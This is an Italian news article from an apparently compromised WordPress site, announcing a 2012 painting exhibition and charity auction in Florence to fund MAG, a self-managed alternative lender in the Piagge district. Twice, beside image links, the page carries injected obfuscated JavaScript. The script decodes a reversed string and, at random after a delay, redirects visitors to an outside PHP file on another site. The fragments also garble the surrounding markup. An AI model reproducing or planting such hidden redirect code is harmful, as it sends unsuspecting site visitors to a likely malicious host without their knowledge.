MAG Firenze, ci siamo quasi. Dipinti all'asta per la finanziaria autogestita delle Piagge

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://altracitta.org/wp-content/uploads/2012/03/anselmo.jpg”>
Emiliano Anselmo con una sua opera

Dal 15 al 17 marzo a Firenze presso il Teatro delle Spiagge si terrà una mostra di pittura con opere di Emiliano Anselmo e Lina Moretti Nesticò. I dipinti saranno poi messi all’asta sabato pomeriggio, con l’obiettivo di sostenere il progetto MAG, creazione di una finanziaria autogestita alternativa alle banche per dare credito ai più deboli.
«Siamo vicini al primo obiettivo – ci racconta Chiara, una dei referenti del progetto – indispensabile per costituire la MAG, ovvero raccogliere il capitale previsto dalla legge (la ragguardevole cifra di 600mila euro): il percorso è stato lungo, ma non ci è mai mancata la volontà di proseguire, incoraggiati e sostenuti dalla risposta delle persone rispetto a questa proposta tanto ambiziosa quanto secondo noi necessaria».
La mostra e l’asta dei dipinti sono soltanto una delle tante iniziative che nel tempo sono servite a far conoscere il progetto nel territorio fiorentino e non solo, e ovviamente a finanziarlo. Il progetto MAG può contare da tempo anche sul lavoro dei nodi territoriali presenti nei vari quartieri cittadini, di cui ricordiamo i prossimi appuntamenti:
Mercoledì 14 marzo 2012 ore 21,15 Progetto Arcobaleno – Via del Leone, 9 Mercoledì 21 marzo 2012 ore 21,15 Parrocchia Madonna della Tosse Via Largo A. Zoli, 1 – Zona Ponte Rosso
Mercoledì 28 marzo 2012 ore 21,15 Cabina Teatrale di Saverio Tommasi Via Romagnosi, 13/a

«Presso il Teatro delle Spiagge – conclude Chiara – esporranno le loro opere due artisti che hanno voluto sostenerci perché conoscono la nostra esperienza qui alle Piagge e condividono i valori che animano il progetto MAG. Invitiamo dunque tutti a visitare la mostra e magari a partecipare all’asta per acquistare una delle loro bellissimi creazioni».
Emiliano Anselmo è un giovane pittore fiorentino che vive e lavora alle Piagge. La sua pittura denuncia un disagio sociale che si manifesta con il contrasto dei colori e delle figure umane in ampi spazi.
Lina Moretti Nesticò è pittrice e grafica. Si esprime con varie tecniche, dall’olio all’encausto agli acquerelli, con la massima libertà espressiva e privilegiando la figura umana.

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2012/03/moretti_nestico.gif”>
un'opera di Lina Moretti Nesticò

La mostra si apre giovedì 15 marzo alle ore 16 e si conclude sabato 17 con l’asta di solidarietà alle 17.30. Segue aperitivo.

Orari mostra
giovedi e venerdi 16.00 – 20.30
sabato 12.00 – 17.00
Il Teatro delle Spiagge è in via del Pesciolino 26 a Firenze (via Pistoiese, altezza Conad).

Info: Associazione Verso MAG Firenze – tel. 055.373737
info@magfirenze.it | www.magfirenze.it

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *